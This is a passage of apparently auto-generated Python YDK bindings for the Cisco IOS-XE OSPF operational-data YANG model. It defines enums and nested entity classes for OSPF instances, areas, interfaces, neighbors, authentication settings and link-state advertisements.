ospfv2_crypto_cleartest = Enum.YLeaf(0, "ospfv2-crypto-cleartest") ospfv2_crypto_md5 = Enum.YLeaf(1, "ospfv2-crypto-md5") class Ospfv2IntfState(Enum): ospfv2_interface_state_down = Enum.YLeaf(0, "ospfv2-interface-state-down") ospfv2_interface_state_loopback = Enum.YLeaf(1, "ospfv2-interface-state-loopback") ospfv2_interface_state_waiting = Enum.YLeaf(2, "ospfv2-interface-state-waiting") ospfv2_interface_state_point_to_mpoint = Enum.YLeaf(3, "ospfv2-interface-state-point-to-mpoint") ospfv2_interface_state_point_to_point = Enum.YLeaf(4, "ospfv2-interface-state-point-to-point") ospfv2_interface_state_dr = Enum.YLeaf(5, "ospfv2-interface-state-dr") ospfv2_interface_state_backup = Enum.YLeaf(6, "ospfv2-interface-state-backup") ospfv2_interface_state_other = Enum.YLeaf(7, "ospfv2-interface-state-other") class Ospfv2LsaType(Enum): ospfv2_lsa_type_unsupported_lsa_type = Enum.YLeaf(0, "ospfv2-lsa-type-unsupported-lsa-type") ospfv2_lsa_type_router = Enum.YLeaf(1, "ospfv2-lsa-type-router") ospfv2_lsa_type_network = Enum.YLeaf(2, "ospfv2-lsa-type-network") ospfv2_lsa_type_summary_net = Enum.YLeaf(3, "ospfv2-lsa-type-summary-net") ospfv2_lsa_type_summary_router = Enum.YLeaf(4, "ospfv2-lsa-type-summary-router") ospfv2_lsa_type_as_external = Enum.YLeaf(5, "ospfv2-lsa-type-as-external") ospfv2_lsa_type_nssa = Enum.YLeaf(6, "ospfv2-lsa-type-nssa") ospfv2_lsa_type_link_scope_opaque = Enum.YLeaf(7, "ospfv2-lsa-type-link-scope-opaque") ospfv2_lsa_type_area_scope_opaque = Enum.YLeaf(8, "ospfv2-lsa-type-area-scope-opaque") ospfv2_lsa_type_as_scope_opaque = Enum.YLeaf(9, "ospfv2-lsa-type-as-scope-opaque") class OspfOperData(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData, self).__init__() self._top_entity = None self.yang_name = "ospf-oper-data" self.yang_parent_name = "Cisco-IOS-XE-ospf-oper" self.is_top_level_class = True self.has_list_ancestor = False self.ylist_key_names = [] self._child_classes = OrderedDict([("ospf-state", 
("ospf_state", OspfOperData.OspfState)), ("ospfv2-instance", ("ospfv2_instance", OspfOperData.Ospfv2Instance))]) self._leafs = OrderedDict() self.ospf_state = None self._children_name_map["ospf_state"] = "ospf-state" self.ospfv2_instance = YList(self) self._segment_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData, [], name, value) class OspfState(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState, self).__init__() self.yang_name = "ospf-state" self.yang_parent_name = "ospf-oper-data" self.is_top_level_class = False self.has_list_ancestor = False self.ylist_key_names = [] self._child_classes = OrderedDict([("ospf-instance", ("ospf_instance", OspfOperData.OspfState.OspfInstance))]) self.is_presence_container = True self._leafs = OrderedDict([ ('op_mode', (YLeaf(YType.enumeration, 'op-mode'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfOperationMode', '')])), ]) self.op_mode = None self.ospf_instance = YList(self) self._segment_path = lambda: "ospf-state" self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/%s" % self._segment_path() self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState, ['op_mode'], name, value) class OspfInstance(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance, self).__init__() self.yang_name = "ospf-instance" self.yang_parent_name = "ospf-state" self.is_top_level_class = False self.has_list_ancestor = False self.ylist_key_names = ['af','router_id'] self._child_classes = OrderedDict([("ospf-area", ("ospf_area", OspfOperData.OspfState.OspfInstance.OspfArea)), ("link-scope-lsas", ("link_scope_lsas", OspfOperData.OspfState.OspfInstance.LinkScopeLsas)), ("multi-topology", ("multi_topology", 
OspfOperData.OspfState.OspfInstance.MultiTopology))]) self._leafs = OrderedDict([ ('af', (YLeaf(YType.enumeration, 'af'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'AddressFamily', '')])), ('router_id', (YLeaf(YType.uint32, 'router-id'), ['int'])), ('process_id', (YLeaf(YType.uint16, 'process-id'), ['int'])), ]) self.af = None self.router_id = None self.process_id = None self.ospf_area = YList(self) self.link_scope_lsas = YList(self) self.multi_topology = YList(self) self._segment_path = lambda: "ospf-instance" + "[af='" + str(self.af) + "']" + "[router-id='" + str(self.router_id) + "']" self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/ospf-state/%s" % self._segment_path() self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance, ['af', 'router_id', 'process_id'], name, value) class OspfArea(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea, self).__init__() self.yang_name = "ospf-area" self.yang_parent_name = "ospf-instance" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['area_id'] self._child_classes = OrderedDict([("ospf-interface", ("ospf_interface", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa))]) self._leafs = OrderedDict([ ('area_id', (YLeaf(YType.uint32, 'area-id'), ['int'])), ]) self.area_id = None self.ospf_interface = YList(self) self.area_scope_lsa = YList(self) self._segment_path = lambda: "ospf-area" + "[area-id='" + str(self.area_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea, ['area_id'], name, value) class OspfInterface(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): 
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface, self).__init__() self.yang_name = "ospf-interface" self.yang_parent_name = "ospf-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['name'] self._child_classes = OrderedDict([("multi-area", ("multi_area", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea)), ("static-neighbor", ("static_neighbor", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor)), ("fast-reroute", ("fast_reroute", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute)), ("ttl-security", ("ttl_security", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity)), ("authentication", ("authentication", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication)), ("ospf-neighbor", ("ospf_neighbor", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor)), ("intf-link-scope-lsas", ("intf_link_scope_lsas", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas)), ("intf-multi-topology", ("intf_multi_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology))]) self._leafs = OrderedDict([ ('name', (YLeaf(YType.str, 'name'), ['str'])), ('network_type', (YLeaf(YType.enumeration, 'network-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfNetworkType', '')])), ('passive', (YLeaf(YType.boolean, 'passive'), ['bool'])), ('demand_circuit', (YLeaf(YType.boolean, 'demand-circuit'), ['bool'])), ('node_flag', (YLeaf(YType.boolean, 'node-flag'), ['bool'])), ('cost', (YLeaf(YType.uint16, 'cost'), ['int'])), ('hello_interval', (YLeaf(YType.uint16, 'hello-interval'), ['int'])), ('dead_interval', (YLeaf(YType.uint16, 'dead-interval'), ['int'])), ('retransmit_interval', (YLeaf(YType.uint16, 'retransmit-interval'), ['int'])), ('transmit_delay', (YLeaf(YType.uint16, 'transmit-delay'), ['int'])), ('mtu_ignore', (YLeaf(YType.boolean, 'mtu-ignore'), 
['bool'])), ('lls', (YLeaf(YType.boolean, 'lls'), ['bool'])), ('prefix_suppression', (YLeaf(YType.boolean, 'prefix-suppression'), ['bool'])), ('bfd', (YLeaf(YType.boolean, 'bfd'), ['bool'])), ('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])), ('state', (YLeaf(YType.str, 'state'), ['str'])), ('hello_timer', (YLeaf(YType.uint32, 'hello-timer'), ['int'])), ('wait_timer', (YLeaf(YType.uint32, 'wait-timer'), ['int'])), ('dr', (YLeaf(YType.str, 'dr'), ['str','str'])), ('bdr', (YLeaf(YType.str, 'bdr'), ['str','str'])), ('priority', (YLeaf(YType.uint8, 'priority'), ['int'])), ]) self.name = None self.network_type = None self.passive = None self.demand_circuit = None self.node_flag = None self.cost = None self.hello_interval = None self.dead_interval = None self.retransmit_interval = None self.transmit_delay = None self.mtu_ignore = None self.lls = None self.prefix_suppression = None self.bfd = None self.enable = None self.state = None self.hello_timer = None self.wait_timer = None self.dr = None self.bdr = None self.priority = None self.multi_area = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea() self.multi_area.parent = self self._children_name_map["multi_area"] = "multi-area" self.fast_reroute = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute() self.fast_reroute.parent = self self._children_name_map["fast_reroute"] = "fast-reroute" self.ttl_security = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity() self.ttl_security.parent = self self._children_name_map["ttl_security"] = "ttl-security" self.authentication = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication() self.authentication.parent = self self._children_name_map["authentication"] = "authentication" self.static_neighbor = YList(self) self.ospf_neighbor = YList(self) self.intf_link_scope_lsas = YList(self) self.intf_multi_topology = YList(self) self._segment_path = lambda: "ospf-interface" + "[name='" + str(self.name) + 
"']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface, ['name', 'network_type', 'passive', 'demand_circuit', 'node_flag', 'cost', 'hello_interval', 'dead_interval', 'retransmit_interval', 'transmit_delay', 'mtu_ignore', 'lls', 'prefix_suppression', 'bfd', 'enable', 'state', 'hello_timer', 'wait_timer', 'dr', 'bdr', 'priority'], name, value) class MultiArea(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea, self).__init__() self.yang_name = "multi-area" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('multi_area_id', (YLeaf(YType.uint32, 'multi-area-id'), ['int'])), ('cost', (YLeaf(YType.uint16, 'cost'), ['int'])), ]) self.multi_area_id = None self.cost = None self._segment_path = lambda: "multi-area" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea, ['multi_area_id', 'cost'], name, value) class StaticNeighbor(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor, self).__init__() self.yang_name = "static-neighbor" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['address'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('address', (YLeaf(YType.str, 'address'), ['str','str'])), ('cost', (YLeaf(YType.uint16, 'cost'), ['int'])), ('poll_interval', (YLeaf(YType.uint16, 'poll-interval'), ['int'])), ]) self.address = None self.cost = None self.poll_interval = None self._segment_path = lambda: "static-neighbor" + "[address='" + 
str(self.address) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor, ['address', 'cost', 'poll_interval'], name, value) class FastReroute(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute, self).__init__() self.yang_name = "fast-reroute" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('candidate_disabled', (YLeaf(YType.boolean, 'candidate-disabled'), ['bool'])), ('enabled', (YLeaf(YType.boolean, 'enabled'), ['bool'])), ('remote_lfa_enabled', (YLeaf(YType.boolean, 'remote-lfa-enabled'), ['bool'])), ]) self.candidate_disabled = None self.enabled = None self.remote_lfa_enabled = None self._segment_path = lambda: "fast-reroute" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute, ['candidate_disabled', 'enabled', 'remote_lfa_enabled'], name, value) class TtlSecurity(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity, self).__init__() self.yang_name = "ttl-security" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('enabled', (YLeaf(YType.boolean, 'enabled'), ['bool'])), ('hops', (YLeaf(YType.uint8, 'hops'), ['int'])), ]) self.enabled = None self.hops = None self._segment_path = lambda: "ttl-security" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity, 
['enabled', 'hops'], name, value) class Authentication(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication, self).__init__() self.yang_name = "authentication" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("crypto-algorithm-val", ("crypto_algorithm_val", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal))]) self._leafs = OrderedDict([ ('sa', (YLeaf(YType.str, 'sa'), ['str'])), ('key_chain', (YLeaf(YType.str, 'key-chain'), ['str'])), ('key_string', (YLeaf(YType.str, 'key-string'), ['str'])), ('no_auth', (YLeaf(YType.uint32, 'no-auth'), ['int'])), ]) self.sa = None self.key_chain = None self.key_string = None self.no_auth = None self.crypto_algorithm_val = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal() self.crypto_algorithm_val.parent = self self._children_name_map["crypto_algorithm_val"] = "crypto-algorithm-val" self._segment_path = lambda: "authentication" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication, ['sa', 'key_chain', 'key_string', 'no_auth'], name, value) class CryptoAlgorithmVal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal, self).__init__() self.yang_name = "crypto-algorithm-val" self.yang_parent_name = "authentication" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('hmac_sha1_12', (YLeaf(YType.empty, 'hmac-sha1-12'), ['Empty'])), ('hmac_sha1_20', (YLeaf(YType.empty, 'hmac-sha1-20'), ['Empty'])), 
('md5', (YLeaf(YType.empty, 'md5'), ['Empty'])), ('sha_1', (YLeaf(YType.empty, 'sha-1'), ['Empty'])), ('hmac_sha_1', (YLeaf(YType.empty, 'hmac-sha-1'), ['Empty'])), ('hmac_sha_256', (YLeaf(YType.empty, 'hmac-sha-256'), ['Empty'])), ('hmac_sha_384', (YLeaf(YType.empty, 'hmac-sha-384'), ['Empty'])), ('hmac_sha_512', (YLeaf(YType.empty, 'hmac-sha-512'), ['Empty'])), ]) self.hmac_sha1_12 = None self.hmac_sha1_20 = None self.md5 = None self.sha_1 = None self.hmac_sha_1 = None self.hmac_sha_256 = None self.hmac_sha_384 = None self.hmac_sha_512 = None self._segment_path = lambda: "crypto-algorithm-val" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal, ['hmac_sha1_12', 'hmac_sha1_20', 'md5', 'sha_1', 'hmac_sha_1', 'hmac_sha_256', 'hmac_sha_384', 'hmac_sha_512'], name, value) class OspfNeighbor(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor, self).__init__() self.yang_name = "ospf-neighbor" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['neighbor_id'] self._child_classes = OrderedDict([("stats", ("stats", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats))]) self._leafs = OrderedDict([ ('neighbor_id', (YLeaf(YType.str, 'neighbor-id'), ['str','str'])), ('address', (YLeaf(YType.str, 'address'), ['str','str'])), ('dr', (YLeaf(YType.str, 'dr'), ['str','str'])), ('bdr', (YLeaf(YType.str, 'bdr'), ['str','str'])), ('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'NbrStateType', '')])), ]) self.neighbor_id = None self.address = None self.dr = None self.bdr = None self.state = None self.stats = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats() self.stats.parent = 
self self._children_name_map["stats"] = "stats" self._segment_path = lambda: "ospf-neighbor" + "[neighbor-id='" + str(self.neighbor_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor, ['neighbor_id', 'address', 'dr', 'bdr', 'state'], name, value) class Stats(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats, self).__init__() self.yang_name = "stats" self.yang_parent_name = "ospf-neighbor" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('nbr_event_count', (YLeaf(YType.uint32, 'nbr-event-count'), ['int'])), ('nbr_retrans_qlen', (YLeaf(YType.uint32, 'nbr-retrans-qlen'), ['int'])), ]) self.nbr_event_count = None self.nbr_retrans_qlen = None self._segment_path = lambda: "stats" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats, ['nbr_event_count', 'nbr_retrans_qlen'], name, value) class IntfLinkScopeLsas(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas, self).__init__() self.yang_name = "intf-link-scope-lsas" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type'] self._child_classes = OrderedDict([("link-scope-lsa", ("link_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), 
['int'])), ]) self.lsa_type = None self.link_scope_lsa = YList(self) self.area_scope_lsa = YList(self) self._segment_path = lambda: "intf-link-scope-lsas" + "[lsa-type='" + str(self.lsa_type) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas, ['lsa_type'], name, value) class LinkScopeLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa, self).__init__() self.yang_name = "link-scope-lsa" self.yang_parent_name = "intf-link-scope-lsas" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_id','adv_router'] self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External)), ("ospfv2-unknown-tlv", ("ospfv2_unknown_tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv)), ("ospfv3-lsa-val", ("ospfv3_lsa_val", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link)), ("ospfv3-prefix-list", ("ospfv3_prefix_list", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList)), 
("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix)), ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology)), ("tlv", ("tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv)), ("unknown-sub-tlv", ("unknown_sub_tlv", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])), ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])), ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])), ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])), ('version', (YLeaf(YType.uint32, 'version'), ['int'])), ('router_address', (YLeaf(YType.str, 'router-address'), ['str','str'])), ]) self.lsa_id = None self.adv_router = None self.decoded_completed = None self.raw_data = [] self.version = None self.router_address = None self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa() self.ospfv2_lsa.parent = self self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa" self.ospfv3_lsa_val = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal() self.ospfv3_lsa_val.parent = self self._children_name_map["ospfv3_lsa_val"] = "ospfv3-lsa-val" self.tlv = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv() self.tlv.parent = self self._children_name_map["tlv"] = "tlv" self.ospfv2_link = YList(self) self.ospfv2_topology = YList(self) self.ospfv2_external = YList(self) self.ospfv2_unknown_tlv = YList(self) self.ospfv3_link = YList(self) self.ospfv3_prefix_list = YList(self) self.ospfv3_ia_prefix = YList(self) self.multi_topology = YList(self) 
self.unknown_sub_tlv = YList(self) self._segment_path = lambda: "link-scope-lsa" + "[lsa-id='" + str(self.lsa_id) + "']" + "[adv-router='" + str(self.adv_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa, ['lsa_id', 'adv_router', 'decoded_completed', 'raw_data', 'version', 'router_address'], name, value) class Ospfv2Lsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, self).__init__() self.yang_name = "ospfv2-lsa" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv2-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa, [], name, value) class Header(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): 
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])), ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])), ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])), ]) self.lsa_id = None self.opaque_type = None self.opaque_id = None self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self.flag_options = Bits() self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value) class LsaBody(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", 
OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network))]) self._leafs = OrderedDict([ ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])), ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])), ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])), ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])), ]) self.num_of_links = None self.summary_mask = None self.external_mask = None self.body_flag_options = Bits() self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value) class Network(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_mask', (YLeaf(YType.str, 